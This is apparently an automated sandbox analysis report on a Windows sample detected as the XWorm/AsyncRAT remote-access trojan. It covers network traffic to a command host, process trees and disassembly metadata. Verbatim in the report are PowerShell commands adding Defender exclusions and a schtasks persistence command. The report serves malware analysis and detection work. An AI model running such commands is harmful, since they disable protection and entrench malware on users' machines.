                                                                                        Jan 7, 2025 06:00:26.599735022 CET8049743208.95.112.1192.168.2.5
                                                                                        Jan 7, 2025 06:00:27.084784031 CET8049743208.95.112.1192.168.2.5
                                                                                        Jan 7, 2025 06:00:27.126354933 CET4974380192.168.2.5208.95.112.1
                                                                                        Jan 7, 2025 06:01:28.060178995 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:28.065088987 CET3921949999147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:28.065182924 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:28.112932920 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:28.117738008 CET3921949999147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:39.003798008 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:39.113607883 CET3921949999147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:40.861277103 CET8049743208.95.112.1192.168.2.5
                                                                                        Jan 7, 2025 06:01:40.861371994 CET4974380192.168.2.5208.95.112.1
                                                                                        Jan 7, 2025 06:01:49.457283974 CET3921949999147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:49.457443953 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:50.860858917 CET4999939219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:50.865427971 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:50.865652084 CET3921949999147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:50.870234966 CET3921950007147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:01:50.870326996 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:50.910499096 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:01:50.915326118 CET3921950007147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:05.111356974 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:05.116173983 CET3921950007147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:07.112608910 CET4974380192.168.2.5208.95.112.1
                                                                                        Jan 7, 2025 06:02:07.117444992 CET8049743208.95.112.1192.168.2.5
                                                                                        Jan 7, 2025 06:02:12.252716064 CET3921950007147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:12.252789021 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:14.595351934 CET5000739219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:14.596678972 CET5001039219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:14.600214958 CET3921950007147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:14.601567984 CET3921950010147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:14.601660967 CET5001039219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:14.668013096 CET5001039219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:14.672894001 CET3921950010147.185.221.21192.168.2.5
                                                                                        Jan 7, 2025 06:02:23.298557043 CET5001039219192.168.2.5147.185.221.21
                                                                                        Jan 7, 2025 06:02:23.303500891 CET3921950010147.185.221.21192.168.2.5

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 7, 2025 06:00:26.559282064 CET5276653192.168.2.51.1.1.1
                                                                                        Jan 7, 2025 06:00:26.565876007 CET53527661.1.1.1192.168.2.5
                                                                                        Jan 7, 2025 06:01:28.023303986 CET5048453192.168.2.51.1.1.1
                                                                                        Jan 7, 2025 06:01:28.055989981 CET53504841.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Jan 7, 2025 06:00:26.559282064 CET192.168.2.51.1.1.10xd2ccStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                        Jan 7, 2025 06:01:28.023303986 CET192.168.2.51.1.1.10x4174Standard query (0)usb-alignment.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Jan 7, 2025 06:00:26.565876007 CET1.1.1.1192.168.2.50xd2ccNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                        Jan 7, 2025 06:01:28.055989981 CET1.1.1.1192.168.2.50x4174No error (0)usb-alignment.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • ip-api.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549743208.95.112.1807544C:\Users\user\Desktop\24572628.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 7, 2025 06:00:26.594882011 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Jan 7, 2025 06:00:27.084784031 CET175INHTTP/1.1 200 OK
                                                                                        Date: Tue, 07 Jan 2025 05:00:26 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 6
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                                        Data Ascii: false


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:00:00:15
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\YPzNsfg4nR.exe"
                                                                                        Imagebase:0x20868a90000
                                                                                        File size:209'408 bytes
                                                                                        MD5 hash:47F35ED89BA0B7756CC4D268E7516F55
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:00:00:15
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:00:00:20
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Users\user\Desktop\24572628.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\24572628.exe"
                                                                                        Imagebase:0x340000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3428603021.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\Desktop\24572628.exe, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Desktop\24572628.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:00:00:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:00:00:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:00:00:34
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:00:00:34
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:00:00:47
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:00:00:47
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:00:01:03
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:00:01:03
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:00:01:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                                                                                        Imagebase:0x7ff7b1660000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:00:01:27
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:00:01:28
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\ProgramData\coding
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\ProgramData\coding
                                                                                        Imagebase:0x130000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\coding, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\coding, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\coding, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:00:01:37
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\OpenWith.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                        Imagebase:0x7ff7959f0000
                                                                                        File size:123'984 bytes
                                                                                        MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:00:01:37
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7e52b0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:00:01:45
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\Windows\System32\OpenWith.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                        Imagebase:0x7ff7959f0000
                                                                                        File size:123'984 bytes
                                                                                        MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:00:02:01
                                                                                        Start date:07/01/2025
                                                                                        Path:C:\ProgramData\coding
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\ProgramData\coding
                                                                                        Imagebase:0xb60000
                                                                                        File size:75'776 bytes
                                                                                        MD5 hash:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FF848A408A0 Relevance: .4, Instructions: 392COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2275174327.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff848a40000_YPzNsfg4nR.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b2a972328e854e320d70eed23c75e4236af0dd63932f4703831f312a823ab2a
                                                                                          • Instruction ID: 65b917e0d8b391717b4e2c40a1b0336d7076fe7b005387ee81a61bf812e46139
                                                                                          • Opcode Fuzzy Hash: 8b2a972328e854e320d70eed23c75e4236af0dd63932f4703831f312a823ab2a
                                                                                          • Instruction Fuzzy Hash: DFC1BD30A0D9498FEBD8FB6CC456AAD77E1EF59780F4401B9D00DCB297DE68AC418762
                                                                                          Function 00007FF848A40BFC Relevance: .1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2275174327.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff848a40000_YPzNsfg4nR.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4136b21b924b3c26f6058a59f477fefce7078fa4e6ca2b6bd750e1558c280955
                                                                                          • Instruction ID: a634f9c21d9c20c2a612d7907240512179b42f8cbe457619f4782530b657a1f8
                                                                                          • Opcode Fuzzy Hash: 4136b21b924b3c26f6058a59f477fefce7078fa4e6ca2b6bd750e1558c280955
                                                                                          • Instruction Fuzzy Hash: 4FF02833E0EA5C9FEBA4F998BC035E9BB94FB82764F04012ED15CC7193D6565512C346

                                                                                          Execution Graph

                                                                                          Execution Coverage:27.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:30%
                                                                                          Total number of Nodes:10
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5163 7ff848a49da8 5165 7ff848a49db1 SetWindowsHookExW 5163->5165 5166 7ff848a49e81 5165->5166 5167 7ff848a49758 5168 7ff848a49723 5167->5168 5168->5167 5169 7ff848a49902 RtlSetProcessIsCritical 5168->5169 5170 7ff848a49962 5169->5170 5171 7ff848a47a81 5172 7ff848a47a9f CheckRemoteDebuggerPresent 5171->5172 5174 7ff848a47b3f 5172->5174

                                                                                          Executed Functions

                                                                                          Function 00007FF848A41290 Relevance: 2.0, Strings: 1, Instructions: 746COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CAO_^
                                                                                          • API String ID: 0-3111533842
                                                                                          • Opcode ID: 80fd8647bcc297e7808993d96842d59bc5508b803f8da70c1d3c27dae35d9ba1
                                                                                          • Instruction ID: 2179cd035cf2d1dd84762b3a09dc8628354dc931cead1e27671ac335c34a9b2d
                                                                                          • Opcode Fuzzy Hash: 80fd8647bcc297e7808993d96842d59bc5508b803f8da70c1d3c27dae35d9ba1
                                                                                          • Instruction Fuzzy Hash: 6832B560F2DA559FEB94FB38945A279B7D2FF88B80F440579D40EC3287DE68AC018742
                                                                                          Function 00007FF848A41719 Relevance: 1.9, Strings: 1, Instructions: 696COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 174 7ff848a41719-7ff848a41750 176 7ff848a41f7f-7ff848a41fc6 174->176 177 7ff848a41756-7ff848a41780 call 7ff848a40638 174->177 187 7ff848a4178c-7ff848a41885 call 7ff848a40638 * 6 call 7ff848a40a48 177->187 188 7ff848a41787 call 7ff848a40638 177->188 218 7ff848a4188f-7ff848a41906 call 7ff848a404b8 call 7ff848a404b0 call 7ff848a40358 call 7ff848a40368 187->218 219 7ff848a41887-7ff848a4188e 187->219 188->187 234 7ff848a41919-7ff848a41929 218->234 235 7ff848a41908-7ff848a41912 218->235 219->218 238 7ff848a4192b-7ff848a4194a call 7ff848a40358 234->238 239 7ff848a41951-7ff848a41971 234->239 235->234 238->239 245 7ff848a41973-7ff848a4197d call 7ff848a40378 239->245 246 7ff848a41982-7ff848a419ad 239->246 245->246 251 7ff848a419ba-7ff848a419e6 call 7ff848a41038 246->251 252 7ff848a419af-7ff848a419b9 246->252 258 7ff848a419ec-7ff848a41a81 251->258 259 7ff848a41a86-7ff848a41b14 251->259 252->251 279 7ff848a41b1b-7ff848a41c59 call 7ff848a40870 call 7ff848a41288 call 7ff848a40388 call 7ff848a40398 258->279 259->279 302 7ff848a41c5b-7ff848a41c8e 279->302 303 7ff848a41ca7-7ff848a41cda 279->303 302->303 310 7ff848a41c90-7ff848a41c9d 302->310 313 7ff848a41cff-7ff848a41d2f 303->313 314 7ff848a41cdc-7ff848a41cfd 303->314 310->303 315 7ff848a41c9f-7ff848a41ca5 310->315 317 7ff848a41d37-7ff848a41d6e 313->317 314->317 315->303 323 7ff848a41d93-7ff848a41dc3 317->323 324 7ff848a41d70-7ff848a41d91 317->324 326 7ff848a41dcb-7ff848a41ead call 7ff848a403a8 call 7ff848a409e8 call 7ff848a41038 323->326 324->326 344 7ff848a41eaf call 7ff848a41220 326->344 345 7ff848a41eb4-7ff848a41f4d 326->345 344->345
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CAO_^
                                                                                          • API String ID: 0-3111533842
                                                                                          • Opcode ID: 7445596f5be5703a3930d9eb5f218c3e2953512881affececd6b800d3bb148ca
                                                                                          • Instruction ID: 30238790d9641d8cc19656d048e0ef189c3e199be52cc2b08c1d936ba3e8a860
                                                                                          • Opcode Fuzzy Hash: 7445596f5be5703a3930d9eb5f218c3e2953512881affececd6b800d3bb148ca
                                                                                          • Instruction Fuzzy Hash: E322C660F2DA595FEB98FB38945A2B976D2FF88B80F440579D40EC32C7DE68AC018751
                                                                                          Function 00007FF848A47A81 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 403 7ff848a47a81-7ff848a47b3d CheckRemoteDebuggerPresent 407 7ff848a47b3f 403->407 408 7ff848a47b45-7ff848a47b88 403->408 407->408
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 36d66c98cb0fb942b6c7a24302ef17dda0a13ab4f4a21c14c130eb2cea910986
                                                                                          • Instruction ID: fa5851f79cdb3b88f6b07204ad4caac973945b5eba917da76d3f122d184c20e9
                                                                                          • Opcode Fuzzy Hash: 36d66c98cb0fb942b6c7a24302ef17dda0a13ab4f4a21c14c130eb2cea910986
                                                                                          • Instruction Fuzzy Hash: 0031223190875C8FCB58DF6CC88A7E97BE0FF65311F05426AD489D7292CB74A846CB91
                                                                                          Function 00007FF848A460C6 Relevance: .5, Instructions: 473COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 753 7ff848a460c6-7ff848a460d3 754 7ff848a460de-7ff848a461a7 753->754 755 7ff848a460d5-7ff848a460dd 753->755 759 7ff848a461a9-7ff848a461b2 754->759 760 7ff848a46213 754->760 755->754 759->760 761 7ff848a461b4-7ff848a461c0 759->761 762 7ff848a46215-7ff848a4623a 760->762 763 7ff848a461f9-7ff848a46211 761->763 764 7ff848a461c2-7ff848a461d4 761->764 769 7ff848a4623c-7ff848a46245 762->769 770 7ff848a462a6 762->770 763->762 765 7ff848a461d8-7ff848a461eb 764->765 766 7ff848a461d6 764->766 765->765 768 7ff848a461ed-7ff848a461f5 765->768 766->765 768->763 769->770 771 7ff848a46247-7ff848a46253 769->771 772 7ff848a462a8-7ff848a46350 770->772 773 7ff848a4628c-7ff848a462a4 771->773 774 7ff848a46255-7ff848a46267 771->774 783 7ff848a463be 772->783 784 7ff848a46352-7ff848a4635c 772->784 773->772 775 7ff848a4626b-7ff848a4627e 774->775 776 7ff848a46269 774->776 775->775 778 7ff848a46280-7ff848a46288 775->778 776->775 778->773 786 7ff848a463c0-7ff848a463e9 783->786 784->783 785 7ff848a4635e-7ff848a4636b 784->785 787 7ff848a4636d-7ff848a4637f 785->787 788 7ff848a463a4-7ff848a463bc 785->788 793 7ff848a463eb-7ff848a463f6 786->793 794 7ff848a46453 786->794 789 7ff848a46383-7ff848a46396 787->789 790 7ff848a46381 787->790 788->786 789->789 792 7ff848a46398-7ff848a463a0 789->792 790->789 792->788 793->794 796 7ff848a463f8-7ff848a46406 793->796 795 7ff848a46455-7ff848a464e6 794->795 804 7ff848a464ec-7ff848a464fb 795->804 797 7ff848a46408-7ff848a4641a 796->797 798 7ff848a4643f-7ff848a46451 796->798 800 7ff848a4641e-7ff848a46431 797->800 801 7ff848a4641c 797->801 798->795 800->800 802 7ff848a46433-7ff848a4643b 800->802 801->800 802->798 805 7ff848a464fd 804->805 806 7ff848a46503-7ff848a46568 call 7ff848a46584 804->806 805->806 813 7ff848a4656a 806->813 814 7ff848a4656f-7ff848a46583 806->814 813->814
                                                                                          Memory Dump Source
